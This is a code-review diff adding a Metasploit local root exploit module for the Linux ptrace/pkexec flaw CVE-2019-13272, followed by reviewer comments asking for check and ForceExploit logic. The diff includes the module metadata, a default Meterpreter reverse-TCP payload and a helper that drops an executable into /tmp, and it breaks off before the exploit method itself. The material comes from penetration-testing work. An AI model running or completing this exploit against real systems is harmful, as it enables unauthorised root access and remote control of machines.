modules/exploits/linux/local/pkexec_helper_ptrace.rb

```diff
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
+      'Description'   => %q{
+          In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
+          the recording of the credentials of a process that wants to create a ptrace
+          relationship, which allows local users to obtain root access by leveraging
+          certain scenarios with a parent-child process relationship, where a parent drops
+          privileges and calls execve (potentially allowing control by an attacker). One
+          contributing factor is an object lifetime issue (which can also cause a panic).
+          Another contributing factor is incorrect marking of a ptrace relationship as
+          privileged, which is exploitable through (for example) Polkit's pkexec helper
+          with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in
+          some environments.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Jann Horn',    # Discovery and exploit
+          'timwr',        # Metasploit module
+          'bcoles',       # Metasploit module
+      ],
+      'References'     => [
+          ['CVE', '2019-13272'],
+          ['EDB', '47133'],
+          ['PACKETSTORM', '153663'],
+          ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
+      ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X64 ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'DefaultOptions' =>
+        {
+          'Payload'     => 'linux/x64/meterpreter/reverse_tcp',
+          'PrependFork' => true,
+        },
+      'DisclosureDate' => 'Jul 4 2019'))
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def upload_executable_file(filepath, filedata)
+    print_status("Uploading file: '#{filepath}'")
+    write_file(filepath, filedata)
+    chmod(filepath)
+    register_file_for_cleanup(filepath)
+  end
+
+  def exploit
```

Comment:
Add a check for `check` and a `ForceExploit` override.

Add a check for `is_root?` and a `ForceExploit` override.